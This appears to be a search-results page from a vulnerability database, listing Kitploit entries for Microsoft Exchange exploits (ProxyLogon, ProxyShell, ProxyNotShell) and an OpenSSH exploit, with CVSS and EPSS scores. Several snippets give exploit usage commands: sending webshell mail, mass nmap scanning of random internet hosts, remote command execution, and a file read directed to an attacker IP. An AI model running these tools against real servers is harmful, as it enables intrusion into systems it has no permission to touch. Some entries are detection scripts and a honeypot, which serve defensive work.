Lucene search
+L

2936 matches found

Kitploit
Kitploit
added 2026/09/04 4:53 a.m.2 views

CVE-2021-34473-Exchange-ProxyShell

python sendwebshellmail.py https://mail16.echod.com [email protected] Single retrieval python sendwebshellmail.py https://mail16.echod.com crack Batch read emails from mail.txt and attempt to obtain SID tokens python sendwebshellmail.py https://mail16.echod.com [email protected] send on...

10CVSS7.3AI score0.99999EPSS
SaveExploits16
Kitploit
Kitploit
added 2026/09/04 4:33 a.m.3 views

PowerPriv

PowerPriv DESCRIPTION A powershell implementation of PrivExchange by @dirkjan original code found here: https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py Useful for environments on which you cannot run python-based applications, have user credentials, or do not want to drop fil...

5.9AI score
SaveExploits0References1
Kitploit
Kitploit
added 2026/09/04 4:29 a.m.3 views

CVE-2022-41040-metasploit-ProxyNotShell

CVE-2022-41040-metasploit-ProxyNotShell the metasploit scriptPOC about CVE-2022-41040. Microsoft Exchange are vulnerable to a server-side request forgery SSRF attack. An authenticated attacker can use the vulnerability to elevate privileges. preparation POC root@kitploit: git clone...

8.8CVSS5.9AI score0.99956EPSS
SaveExploits9References4
Kitploit
Kitploit
added 2026/09/04 4:02 a.m.3 views

proxylogon

proxylogon my exploit for the proxylogon chain Microsoft Exchange Server - CVE-2021-26855 Run: the exploit uses Impacket package, to install it run this: root@kitploit: user@host:$ python3 -m pip install impacket then clone the exploit repo, and enter the exploit directory: root@kitploit:...

9.8CVSS7.3AI score0.99996EPSS
SaveExploits65
Kitploit
Kitploit
added 2026/09/04 3:45 a.m.5 views

CVE-2020-0688_EXP

CVE-2020-0688EXP CVE-2020-0688EXP Auto trigger payload root@kitploit: python3 CVE-2020-0688EXP.py -h usage: CVE-2020-0688EXP.py -h -s SERVER -u USER -p PASSWORD -c CMD -e optional arguments: -h, --help show this help message and exit -s SERVER, --server ECP Server URL Example: http://ip/owa -u...

9CVSS7.3AI score0.99965EPSS
SaveExploits29
Kitploit
Kitploit
added 2026/09/04 3:44 a.m.4 views

CVE-2021-34473-NMAP-SCANNER

CVE-2021-34473-NMAP-SCANNER A massive scanner for CVE-2021-34473 Microsoft Exchange Windows Vulnerability Commands root@kitploit: nmap -iR 500000 -n -p 443 --script cve202134473.nse scan500k.txt nmap website.com -n -p 443 --script cve202134473.nse Example root@kitploit: Starting Nmap 7.92...

10CVSS7.2AI score0.99999EPSS
SaveExploits16
Kitploit
Kitploit
added 2026/09/04 2:57 a.m.5 views

Proxyshell-Scanner

Proxyshell-Scanner nuclei scanner for Proxyshell RCE CVE-2021-34423,CVE-2021-34473,CVE-2021-31207 discovered by orange tsai in Pwn2Own, which affect microsoft exchange server. POC Resource https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html...

10CVSS7AI score0.99999EPSS
SaveExploits17
Kitploit
Kitploit
added 2026/09/04 2:42 a.m.3 views

ExchangeFinder

ExchangeFinder ExchangeFinder is a simple and open-source tool that tries to find Micrsoft Exchange instance for a given domain based on the top common DNS names for Microsoft Exchange. ExchangeFinder can identify the exact version of Microsoft Exchange starting from Microsoft Exchange 4.0 to...

5.9AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/04 2:26 a.m.3 views

CVE-2021-26855-SSRF

CVE-2021-26855-SSRF-Poc This script helps to identify CVE-2021-26855 ssrf Poc Reference: https://proxylogon.com/ Script usage python CVE-2021-26855.py -H target.com -B xxxxxxxxxxxxxxxxxx.burpcollaborator.net If you are able to retrieve tokens through HTTPS request. then the target is vulnerable...

9.8CVSS7.3AI score0.99996EPSS
SaveExploits65
Kitploit
Kitploit
added 2026/09/04 1:35 a.m.3 views

ProxyLogon

ProxyLogon ProxyLogon is the formally generic name for CVE-2021-26855, a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication and impersonating as the admin. We have also chained this bug with another post-auth arbitrary-file-write vulnerability,...

9.8CVSS7.4AI score0.99996EPSS
SaveExploits65
Kitploit
Kitploit
added 2026/09/04 1:20 a.m.3 views

CVE-2021-26855-exploit-Exchange

CVE-2021-26855 exploit-Exchange विश्व को स्वतः स्कैन करें और स्वतः rce का शोषण करें EOG टीम द्वारा...

9.8CVSS7.3AI score0.99996EPSS
SaveExploits65
Kitploit
Kitploit
added 2026/09/04 1:12 a.m.4 views

cve-2024-6387-poc

cve-2024-6387-poc a signal handler race condition in OpenSSH's server sshd 7etsuo Description An exploit for CVE-2024-6387, targeting a signal handler race condition in OpenSSH's server sshd on glibc-based Linux systems. The vulnerability allows for remote code execution as root due to...

8.1CVSS7.8AI score0.99506EPSS
SaveExploits71
Kitploit
Kitploit
added 2026/09/04 12:14 a.m.3 views

CVE-2021-34473-scanner

CVE-2021-34473-scanner Scanner for CVE-2021-34473, ProxyShell, A Microsoft Exchange On-premise Vulnerability To test machines one by one, use scanner-CVE-2021-34473.bat: scanner-CVE-2021-34473.bat mail.exemple.fr To test multiple machines at once, use mass-scanner and add ip/FQDN to check, one by...

10CVSS7.3AI score0.99999EPSS
SaveExploits16
Kitploit
Kitploit
added 2026/09/04 12:11 a.m.4 views

CVE-2026-45504

CVE-2026-45504 Exchange File Read CVE-2026-45504 Exchange File Read Research Blog python3 CVE-2026-45504.py --attacker-ip 192.168.2.238 --attacker-port 9020 --creds [email protected] --password Hawktrace1 --target https://mail.exchange.local --target-file...

8.8CVSS7.2AI score0.00846EPSS
SaveExploits0
Kitploit
Kitploit
added 2026/09/03 11:55 p.m.3 views

cve-2021-27065

I will continue to add any new code or modify existing code based on searching for stolen data If you have been compromised these scripts will by no means fix it for you! These provide no benifit to you other than you now knowing the extent of what has happened to your system With that being said...

7.8CVSS7.4AI score0.99876EPSS
SaveExploits31
Kitploit
Kitploit
added 2026/09/03 11:54 p.m.3 views

exchange_webshell_detection

This project has been discontinued Please use Microsoft tools instead: Microsoft Safety Scanner Other detections and mitigations listed in: https://github.com/microsoft/CSS-Exchange/tree/main/Security When assessing impact we strongly suggest to assume breach and to preemptively examine all MS...

7.8CVSS7.3AI score0.99876EPSS
SaveExploits32References5
Kitploit
Kitploit
added 2026/09/03 11:54 p.m.2 views

Exch-CVE-2021-26855

Exch-CVE-2021-26855 ProxyLogon is the formally generic name for CVE-2021-26855, a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication and impersonating as the admin. We have also chained this bug with another post-auth arbitrary-file-write vulnerability...

9.8CVSS7.6AI score0.99996EPSS
SaveExploits65
Kitploit
Kitploit
added 2026/09/03 11:53 p.m.7 views

CVE-2021-28480_HoneyPoC3

ExchangeRCE-CVE-2021-28480 THIS IS NOT A REAL EXPLOIT IT IS A HONEYPOC https://blog.zsec.uk/cve-2020-1350-honeypoc/ PoC for exploiting RCE in Exchange CVEs: CVE-2021-28480, CVE-2021-28481, CVE-2021-28482 and CVE-2021-28483. Usage Achieves RCE on Exchange Servers To run, from a Linux host:...

10CVSS7.4AI score0.71425EPSS
SaveExploits3
Kitploit
Kitploit
added 2026/09/03 11:40 p.m.3 views

proxylogon-exploit

proxylogon Proof-of-concept exploit for CVE-2021-26855 and CVE-2021-27065, which allows for unauthenticated remote code execution on Microsoft Exchange as described in the following resources: https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers...

9.8CVSS7.3AI score0.99996EPSS
SaveExploits67
Kitploit
Kitploit
added 2026/09/03 11:35 p.m.5 views

CVE-2021-26855

CVE-2021-26855 CVE-2021-26855, also known as Proxylogon, is a server-side request forgery SSRF vulnerability in Exchange that allows an attacker to send arbitrary HTTP requests and authenticate as the Exchange server. According to Orange Tsai, the researcher who discovered the vulnerabilities,...

9.8CVSS7.3AI score0.99996EPSS
SaveExploits65
Rows per page
Query Builder